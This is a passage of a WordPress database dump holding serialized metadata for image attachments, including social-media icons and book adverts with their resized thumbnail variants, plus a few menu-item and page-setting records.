:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13467,5190,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:12:\"facebook.png\";}}'),(13468,5049,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:98;s:6:\"height\";i:98;s:4:\"file\";s:17:\"facebook-icon.png\";}s:18:\"full-1587088908786\";a:3:{s:5:\"width\";i:50;s:6:\"height\";i:50;s:4:\"file\";s:32:\"facebook-icon-e1587088871200.png\";}}'),(13469,5046,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:98;s:6:\"height\";i:98;s:4:\"file\";s:16:\"twitter-icon.png\";}}'),(13470,5048,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:96;s:6:\"height\";i:96;s:4:\"file\";s:18:\"linked-in-icon.png\";}}'),(13471,5047,'_wp_attachment_backup_sizes','a:2:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:90;s:6:\"height\";i:90;s:4:\"file\";s:18:\"Pinterest-icon.png\";}s:18:\"full-1587089358407\";a:3:{s:5:\"width\";i:30;s:6:\"height\";i:30;s:4:\"file\";s:33:\"Pinterest-icon-e1587089009465.png\";}}'),(13475,5192,'_wp_attached_file','2020/04/tumblr-e1587089403117.png'),(13476,5192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:26;s:6:\"height\";i:26;s:4:\"file\";s:33:\"2020/04/tumblr-e1587089403117.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"tumblr-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"tumblr-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:18:\"tumblr-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:18:\"tumblr-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:18:\"tumblr-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"tumblr-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:18:\"tumblr-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"tumblr-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(13477,5192,'_wp_attachment_backup_sizes','a:3:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:10:\"tumblr.png\";}s:18:\"full-1587089324753\";a:3:{s:5:\"width\";i:28;s:6:\"height\";i:28;s:4:\"file\";s:25:\"tumblr-e1587089300794.png\";}s:18:\"full-1587089403117\";a:3:{s:5:\"width\";i:28;s:6:\"height\";i:28;s:4:\"file\";s:25:\"tumblr-e1587089324753.png\";}}'),(13478,5193,'_edit_lock','1587303755:1'),(13479,5193,'_edit_last','1'),(13480,5193,'qodef_page_content_behind_header_meta','no'),(13481,5193,'qodef_boxed_background_image_attachment_meta','fixed'),(13482,5193,'qodef_disable_vertical_header_background_image_meta','no'),(13483,5193,'qodef_disable_header_widget_logo_area_meta','no'),(13484,5193,'qodef_disable_header_widget_menu_area_meta','no'),(13485,5193,'slide_template','default'),(13486,5193,'rs_page_bg_color','#ffffff'),(13490,5199,'_menu_item_type','post_type'),(13491,5199,'_menu_item_menu_item_parent','0'),(13492,5199,'_menu_item_object_id','5193'),(13493,5199,'_menu_item_object','page'),(13494,5199,'_menu_item_target',''),(13495,5199,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(13496,5199,'_menu_item_xfn',''),(13497,5199,'_menu_item_url',''),(13505,5214,'_wp_attached_file','2020/04/book-slider-AmazonUS.jpg'),(13506,5214,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"2020/04/book-slider-AmazonUS.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUS-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"book-slider-AmazonUS-1080x550.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"book-slider-AmazonUS-550x1080.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"book-slider-AmazonUS-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUS-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13528,5217,'_wp_attached_file','2020/04/book-slider-AmazonUK.jpg'),(13529,5217,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1080;s:6:\"height\";i:1080;s:4:\"file\";s:32:\"2020/04/book-slider-AmazonUK.jpg\";s:5:\"sizes\";a:15:{s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"book-slider-AmazonUK-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"book-slider-AmazonUK-1080x550.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"book-slider-AmazonUK-550x1080.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"book-slider-AmazonUK-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"book-slider-AmazonUK-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13549,5220,'_wp_attached_file','2020/04/book-slider-pic4.jpg'),(13550,5220,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2160;s:6:\"height\";i:2160;s:4:\"file\";s:28:\"2020/04/book-slider-pic4.jpg\";s:5:\"sizes\";a:18:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1024x1024.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1536x1536.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-2048x2048.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:2048;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"book-slider-pic4-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"book-slider-pic4-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"book-slider-pic4-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"book-slider-pic4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"book-slider-pic4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13570,5223,'_wp_attached_file','2020/04/Advert-book-for-NW.jpg'),(13571,5223,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:480;s:6:\"height\";i:480;s:4:\"file\";s:30:\"2020/04/Advert-book-for-NW.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"Advert-book-for-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"Advert-book-for-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13618,1117,'_oembed_a21955ebbb64d044b6b5b11d050512d3',''),(13619,1117,'_oembed_time_a21955ebbb64d044b6b5b11d050512d3','1587261197'),(13620,5245,'_wp_attached_file','2020/04/long-advert-book-NW.jpg'),(13621,5245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2020/04/long-advert-book-NW.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"long-advert-book-NW-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-768x256.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"long-advert-book-NW-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"long-advert-book-NW-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"long-advert-book-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-book-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara Chadwick\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(13622,5246,'_wp_attached_file','2020/04/long-advert-text-NW.jpg'),(13623,5246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:400;s:4:\"file\";s:31:\"2020/04/long-advert-text-NW.jpg\";s:5:\"sizes\";a:16:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-300x100.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"long-advert-text-NW-1024x341.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:341;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-768x256.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"long-advert-text-NW-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"long-advert-text-NW-1100x400.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"long-advert-text-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-600x200.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"long-advert-text-NW-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:13:\"Sara 